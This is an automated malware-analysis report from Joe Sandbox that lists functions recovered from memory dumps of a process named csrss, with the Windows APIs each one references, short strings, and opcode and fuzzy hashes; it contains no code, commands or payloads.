Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: 33bd34a49c5471ca247e8ca13ea7af68b2df2b39308a64e340451df749e688cd
Instruction ID: a7435f5f0a4c90551969e2bf43e5d316129137152fae46cbcb26e44012b9e628
Opcode Fuzzy Hash: 33bd34a49c5471ca247e8ca13ea7af68b2df2b39308a64e340451df749e688cd
Instruction Fuzzy Hash: 33D1C631A59A0A8FFB95E768C455BB9B3E6EF45300F5440BAE00DC72D2CE29EC45C781

Function 00007FFAAC4D05EF Relevance: 1.6, Strings: 1, Instructions: 390COMMON

Download Yara Rule

Strings

b4, xrefs: 00007FFAAC4D0A82

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: b4
API String ID: 0-3371602342
Opcode ID: e1dab90a18bb8c639f55ea83e0f8f5862797503c856fc02e98b53694e3daa4a6
Instruction ID: 679679b1a50231e2395a0c1243abdc861f0026eb9d4a3264668717f5d8226439
Opcode Fuzzy Hash: e1dab90a18bb8c639f55ea83e0f8f5862797503c856fc02e98b53694e3daa4a6
Instruction Fuzzy Hash: 71E1D230519656CFFB49DF18C4E46B47BA1FF46314B5481FEC84E8B68ACA38E885CB85

Function 00007FFAAC4CD7F3 Relevance: 1.6, Strings: 1, Instructions: 361COMMON

Download Yara Rule

Strings

lH_^, xrefs: 00007FFAAC4CD801

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: lH_^
API String ID: 0-2681042615
Opcode ID: b7cc4613ebd5e30c5e6904b316e6546b0f8683618eb60694fe3afa2f882811c7
Instruction ID: 45e083c3220dc42ff5ade3cfe2a44a3ca715e39bc2f0c6e2b0bf3e264594e946
Opcode Fuzzy Hash: b7cc4613ebd5e30c5e6904b316e6546b0f8683618eb60694fe3afa2f882811c7
Instruction Fuzzy Hash: C9412C5298D957C7F25677A8F8198F82740DF82728F08C177D44E891E3CC0D789947D9

Function 00007FFAAC4C61E5 Relevance: 1.6, APIs: 1, Instructions: 103threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 00007FFAAC4C6275

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4c6000_csrss.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: baa7ea5e21ef7f734373ecb98c536edb30ec91f9189071277f2d285ff5a4d646
Instruction ID: 003e458b34027128c1375e542ec2410084f9d67519ff889fbf2540947a1dfe6e
Opcode Fuzzy Hash: baa7ea5e21ef7f734373ecb98c536edb30ec91f9189071277f2d285ff5a4d646
Instruction Fuzzy Hash: 6D31B13190CA4C8FEB49DBA8C849BE9BBF0FB56311F04816ED04DC3662DB65A815CB91

Function 00007FFAAC46AF18 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FFAAC46AF9F

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac460000_csrss.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 48bef8514171885c016aaca157a3e2b31198b88642d0a042feccc370243d65d2
Instruction ID: 858cbe5c94ab4985c7278570bb9306f69c9685920d00d858867c7a9c93ece8aa
Opcode Fuzzy Hash: 48bef8514171885c016aaca157a3e2b31198b88642d0a042feccc370243d65d2
Instruction Fuzzy Hash: 93218071908A0C9FDB58DBA8D849BE9BBF1FB95311F00822FD00DD3651DB71A8568B91

Function 00007FFAAC4C698F Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00007FFAAC4C6A05

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4c6000_csrss.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fc1607e1f34ff0a8db17fbdd314d93244f507edacf3d7d4a9be2d8d387ab010c
Instruction ID: 8848ccce3ab54126796f36677cdc4df35339477d3e9cf7b1b062720d4f86d652
Opcode Fuzzy Hash: fc1607e1f34ff0a8db17fbdd314d93244f507edacf3d7d4a9be2d8d387ab010c
Instruction Fuzzy Hash: E121B33090CA0C8FDB58DF98D449BE9BBE0FB95321F00422ED00DD3651CB71A855CB91

Function 00007FFAAC4C696D Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00007FFAAC4C6A05

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4c6000_csrss.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ee6998873f54e453e9f0c602abaa6fca3e725359e6f5cddf9564aeea9f9c4f4f
Instruction ID: d32614fb7b5f3814f4595fc97b6df4c5be46ce73c069c9d8e881d669a473f834
Opcode Fuzzy Hash: ee6998873f54e453e9f0c602abaa6fca3e725359e6f5cddf9564aeea9f9c4f4f
Instruction Fuzzy Hash: A4118C7490CA4CCFEB49DFA8D4447A8BBF0FB95325F00826AC04ED36A1C765A459CB91

Function 00007FFAAC4CC438 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFAAC4CC707

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 21c9c1430177c97a2d8ad5bff9e4dc34f409a153eb3c931cdc21289b3287000b
Instruction ID: fa84ace22f29a857abfe253fde2c2f94a23b2eebbc8a087feb8c0e816237f785
Opcode Fuzzy Hash: 21c9c1430177c97a2d8ad5bff9e4dc34f409a153eb3c931cdc21289b3287000b
Instruction Fuzzy Hash: 8691D270A1DA0A8BEB49DF18D489A3673E1FF99304B10857DD44EC72A6DA35E843CBC5

Function 00007FFAAC4C6000 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 00007FFAAC4C6002

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4c6000_csrss.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b8095336de7b9babfedd2c30d13547c056f7948a0b2bff3610530b77672734e9
Instruction ID: 3487a3599d5e19304aeaefe815a742b2a278f449ada2adb63f43bac26157998b
Opcode Fuzzy Hash: b8095336de7b9babfedd2c30d13547c056f7948a0b2bff3610530b77672734e9
Instruction Fuzzy Hash: E1E0653250C6058EF7089B5DE4067F4B7E0E751336F00926FE089C2852D769A1AA8BA5

Function 00007FFAAC5D6CEB Relevance: 1.5, Strings: 1, Instructions: 229COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFAAC5D6D06

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-1686368129
Opcode ID: 0c82c431556031ef133d5b323efd484c5202e2dc7c01767282bc4b41ac3a5910
Instruction ID: 04dbe77c0136e1cd79adf5d5cd59f42b63454fcfddd4388a448ad133935b0799
Opcode Fuzzy Hash: 0c82c431556031ef133d5b323efd484c5202e2dc7c01767282bc4b41ac3a5910
Instruction Fuzzy Hash: 3971D13495D64BCFFF56EB68D4517BD7BA4EF46300F1048BAE00ED3191DE28A8468781

Function 00007FFAAC5D1DDB Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFAAC5D1DF6

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-1686368129
Opcode ID: 037163a41376d1c0defe36a5e6b18f233dcaebba754d2fc73ba35210c9d68acb
Instruction ID: 3415465ffa4f40a40509e87b860abc19fa1319fac2e092be06e1b34fab1c19bf
Opcode Fuzzy Hash: 037163a41376d1c0defe36a5e6b18f233dcaebba754d2fc73ba35210c9d68acb
Instruction Fuzzy Hash: 0961E230D5E64BCEFB96DB64C8547BD7BA4EF46320F1045BAE00ED2182DE289845C791

Function 00007FFAAC4CE0FB Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFAAC4CE116

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-1686368129
Opcode ID: ba4f872b77cb03c38aede3651fe93088ff5828d69772ca7c2fee8c8e69ce4feb
Instruction ID: 9fc93e0d74d01b3f8908f762b8917cc6ba0e277279590b0c453966669cdb0f52
Opcode Fuzzy Hash: ba4f872b77cb03c38aede3651fe93088ff5828d69772ca7c2fee8c8e69ce4feb
Instruction Fuzzy Hash: 4851AC7191E54ACFEB56DB64C858ABCBBB1FF0A304F54447AD01ED61A2DF28A805C784

Function 00007FFAAC4CFF0E Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC4CFF53

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 75e0fabd439949fb8553fa18ca5bc0f53974701adccb5619de48cf19eda7e344
Instruction ID: d078bbc31de0c9e9eb1d13a9e83c1ca6ea85bd8735e67078c4e01126357755e4
Opcode Fuzzy Hash: 75e0fabd439949fb8553fa18ca5bc0f53974701adccb5619de48cf19eda7e344
Instruction Fuzzy Hash: 754190706199079BF74AEB28C058B65B7A1FF59304F54C23AC40EC7A96DB38F8558BC8

Function 00007FFAAC4C62B4 Relevance: 1.4, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFAAC4C6355

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4c6000_csrss.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1042a52ccbeca40200dd01274063a28fde785c796efc12e3b11b4fdec9010c4d
Instruction ID: 589cc05d4ebbac8fbab78fac9b14e103649613dbd22928b43a5b5e63c02c7d06
Opcode Fuzzy Hash: 1042a52ccbeca40200dd01274063a28fde785c796efc12e3b11b4fdec9010c4d
Instruction Fuzzy Hash: F931FB7190CA0C8FEB59DB58C445BF97BE0FF56321F00822ED04DC31A2DA74A855CB91

Function 00007FFAAC4CDD72 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC4CDDA3

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 4a423815fba0299fbf25b675cebf9e9caa335ceeb9a8aa5f611081c3b91e0bd7
Instruction ID: 983891e645e44dfd48f5223df4ccfa761a25bb3f6ff78429712a0f84d90da9f5
Opcode Fuzzy Hash: 4a423815fba0299fbf25b675cebf9e9caa335ceeb9a8aa5f611081c3b91e0bd7
Instruction Fuzzy Hash: 3D212C30E0891D9FDF99DB58C4A5AECB7B1FF68304F0041AAD00EE32A1CE35A941CB40

Function 00007FFAAC4CEEB0 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC4CEEC0

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 9f15dd41353c8d9a03fe8b68c80dccf50c736fc63bfce7d65565cfa1933088f9
Instruction ID: ed90598190cb48cfae99b33649d7b355cc0ec308f4b4f202ce6a6007df93ce09
Opcode Fuzzy Hash: 9f15dd41353c8d9a03fe8b68c80dccf50c736fc63bfce7d65565cfa1933088f9
Instruction Fuzzy Hash: A2212C71E1E685CFF7569768981A2B477E0EF46358F04417AD02EC35E3DE1CA80A46C8

Function 00007FFAAC5D6979 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC5D6993

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 5cdf9cc69649a4c701246b6137689d3a26209419b61709e86cc77710c371199e
Instruction ID: f5117380b4d69ffdcd3c0ff7a05a5d4a8ae6500cf739dd591000f4e8a4552386
Opcode Fuzzy Hash: 5cdf9cc69649a4c701246b6137689d3a26209419b61709e86cc77710c371199e
Instruction Fuzzy Hash: F0215A74E49A0A9FEF99DB58C495AADB7B0EF59310F0045BEE00ED3291CE34A8458B80

Function 00007FFAAC5D1A69 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC5D1A83

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: fd22b337c03529dbae9d9e4f9adc8d99ab4b8827d89ba01edcc33cb6534aead4
Instruction ID: 19af2ef15b7b98e62d12be9e214d4acbb27d98af4effd2f632686f0f79b85089
Opcode Fuzzy Hash: fd22b337c03529dbae9d9e4f9adc8d99ab4b8827d89ba01edcc33cb6534aead4
Instruction Fuzzy Hash: 08215E71E4960A9FEB9DDB58C455AAEB7B1FF58310F4040BEE00FD3291CE34A9408B80

Function 00007FFAAC5D7962 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC5D796E

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: cc9ec84c47147e3aafe878ca0576bc4ceb0cb08098f079cc3f8e03d77795b695
Instruction ID: 80f359e41b984405aa1e6f56e97e2b45142cbbf015b0c988a56b31aea7d44308
Opcode Fuzzy Hash: cc9ec84c47147e3aafe878ca0576bc4ceb0cb08098f079cc3f8e03d77795b695
Instruction Fuzzy Hash: 30E04F42D4E383CFFB5787A408A11A92BE0DB132A070942B6D5598A2D7F95C5C498B92

Function 00007FFAAC4CE310 Relevance: .7, Instructions: 673COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab113edccbb674e251cb03c0992ed193670e5e22d12f8d82ee94ee72025d5e0d
Instruction ID: 3aa3e649eabeee6f47e9b81bded3609edce0fb0e0ce736f113e51286564a5575
Opcode Fuzzy Hash: ab113edccbb674e251cb03c0992ed193670e5e22d12f8d82ee94ee72025d5e0d
Instruction Fuzzy Hash: D1228330A1DA19CFEB99DB18C899A6877E2FF55314F5081B9D01EC72A2DF24EC45CB84

Function 00007FFAAC5D5311 Relevance: .4, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5032b86f042c168b25e3f3781626e57ee95faddf868eae4490442cbe29fc161e
Instruction ID: 081fe1e1184a8986584a15a91a405c499745a88814cedfb7d2fcdf0841dc4b53
Opcode Fuzzy Hash: 5032b86f042c168b25e3f3781626e57ee95faddf868eae4490442cbe29fc161e
Instruction Fuzzy Hash: 9FD1E1B095EB47CFE76ACB28D09067577E5FF45300B50857EE48EC3692DA28F8498781

Function 00007FFAAC5DA241 Relevance: .4, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b365eb794c79046f52cfdbba2d9914e05c3606e250bc4e7e63d71e8246ea7912
Instruction ID: 4a77c3791f8766fe0d104820a71d08a58d133491dcf5cb001f2c1ce5ff55a82a
Opcode Fuzzy Hash: b365eb794c79046f52cfdbba2d9914e05c3606e250bc4e7e63d71e8246ea7912
Instruction Fuzzy Hash: E4D1E43095EB47CFE36ACB28D09467677E5FF45300B10857EE48EC3696DA29F84A8781

Function 00007FFAAC5D0351 Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adcdc438213623d335340c5613e6df5f88bf754a5ae197b382ccb6926105ffe1
Instruction ID: 8b8fa84577af9764acc3e90a3dadf3344332f457a4c0b7528d9947cd74035f45
Opcode Fuzzy Hash: adcdc438213623d335340c5613e6df5f88bf754a5ae197b382ccb6926105ffe1
Instruction Fuzzy Hash: EFD1D13095EB47CFE36ADB24C4906757BE5FF86300B10857EE48E87692DA29F8498781

Function 00007FFAAC5D14C5 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d02b848ea609e663e4be31422084bbc7c2891190a7ec67264c39998ee6d10d0
Instruction ID: 9244f6d80de4cb6b33ea02d464beb1aaed003e43126635705ac28d020f26625d
Opcode Fuzzy Hash: 6d02b848ea609e663e4be31422084bbc7c2891190a7ec67264c39998ee6d10d0
Instruction Fuzzy Hash: 9D51E791CDE797EDF652B774E065AF96B845F02334B288177E04E865E38D0DB48887C1

Function 00007FFAAC4CB9C5 Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad17ebce1e94174db4d2edf00402f91a857f6a0c630075fee1b44ee6f9839f4f
Instruction ID: c3516ba6fc42e6859efd16e910e2ce393caa9db51dd342a4f1239e1232e40d6c
Opcode Fuzzy Hash: ad17ebce1e94174db4d2edf00402f91a857f6a0c630075fee1b44ee6f9839f4f
Instruction Fuzzy Hash: A5B15D30D0EA4ACFEB55DB28C459AA97BE1FF56304F1441B9D44DC72A6DE28EC0987C1

Function 00007FFAAC5D42EF Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11f383a330ec29dfc1d04d10b85912b236f4d3cec1a0bdecad46a81de0c068a
Instruction ID: 9535f5ae95adf469dbab453efd549c648cf265fe333744b793d39f33e86ff880
Opcode Fuzzy Hash: b11f383a330ec29dfc1d04d10b85912b236f4d3cec1a0bdecad46a81de0c068a
Instruction Fuzzy Hash: E6C16D3055A656CBEB0ECF14C0D06B537A5FF46311B5485BEE84F8B68ADB2CE885CB81

Function 00007FFAAC4D060F Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 829160b68f048cb05c4ae9d24f2ef3a8e5da6420a6ecf9ebbde4b26bba7af4ea
Instruction ID: cc5c4fedffcc04956859429cdabf24ca0703bb7c5b7f2aad21a1666931a33a1a
Opcode Fuzzy Hash: 829160b68f048cb05c4ae9d24f2ef3a8e5da6420a6ecf9ebbde4b26bba7af4ea
Instruction Fuzzy Hash: 6EC1C330519556CBFB0ADF14C0E46B53BA1FF46314B5486BED84F8B68BCA38E885CB85

Function 00007FFAAC5D921F Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49274460e83efd8a0fd2632f1681a108d6835b9684a268ec166cfc0bf655c24c
Instruction ID: 92bc20f3233597248438b29fdfc8037977fb93d7ca0439ae91884fb3b08cfc90
Opcode Fuzzy Hash: 49274460e83efd8a0fd2632f1681a108d6835b9684a268ec166cfc0bf655c24c
Instruction Fuzzy Hash: 61C1C370569646CBEB4ECF18C0D06B137A5FF46310B5485BEE84F8B68BDA38E845CB81

Function 00007FFAAC5D6477 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad2149b9e3a2d94a5590647accbe0a0bdb93de0f2ecadc632a42682fd9b36bba
Instruction ID: 06a0c519a23da82e125e10ed583b88898e036b6c39c357f9ccec89b38b2b731d
Opcode Fuzzy Hash: ad2149b9e3a2d94a5590647accbe0a0bdb93de0f2ecadc632a42682fd9b36bba
Instruction Fuzzy Hash: 7921FC4ADCE393CAFA26D3B9A4256B815545F53221F188977F44D861D3DC0CB44F87C2

Function 00007FFAAC5D1567 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d8d143d7b369b192fa01c805d4be5a356973770fa15f79c3062cbfc6381032b
Instruction ID: 941e6d232dc4e7f3014a546bb5fdb206d0d15ce0bf3781fb2eb5cc43df54cd92
Opcode Fuzzy Hash: 7d8d143d7b369b192fa01c805d4be5a356973770fa15f79c3062cbfc6381032b
Instruction Fuzzy Hash: 2521B151DCE387CEF666E77895656BA2E845F12230F1881BBE04E865E3DC0CA84857C2

Function 00007FFAAC46C4D0 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC46C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac46c000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e405da8a99d8db44af2fda8f0f47c394a275e94670a520f65cb6464bfb11608
Instruction ID: a726f81799ca3c4c08207845f2e18adb6d775c79556edf8678ddbae9b98c159d
Opcode Fuzzy Hash: 0e405da8a99d8db44af2fda8f0f47c394a275e94670a520f65cb6464bfb11608
Instruction Fuzzy Hash: 07A1A430A0D546CFF7A5DB28C488B607BD1FF5A318F1485B9C04DCB2A6DA79E84AC781

Function 00007FFAAC4CD88F Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1ed941344428c5f872b7035e3188fcb2e09b5684f934667b82f98826def1533
Instruction ID: da974d26def90b1b5a60ef43c4e734339e809d88732d0613c80b5d91476ae1f1
Opcode Fuzzy Hash: c1ed941344428c5f872b7035e3188fcb2e09b5684f934667b82f98826def1533
Instruction Fuzzy Hash: 43212C12D4EA87CBF226A37868294F82B405F43624F1881B6D84E8E1F3DC0DB46D43DA

Function 00007FFAAC5DB5BC Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca564eab9e52a8197073aa9b1cd6b8eceb34f77493135d51c671913078bae8dd
Instruction ID: 2070c0a9084209099ce36295d6b883d281a893e63e2550c2534bc4d31dba51f1
Opcode Fuzzy Hash: ca564eab9e52a8197073aa9b1cd6b8eceb34f77493135d51c671913078bae8dd
Instruction Fuzzy Hash: B191C36184E7C68FF367D72448166A53FA5DF53210F0942FBE48D8B1A3ED18981E83D2

Function 00007FFAAC5DB37C Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fda569127d78f31da563cf7a96f8b291521fed619f195b9165391b6328691c7c
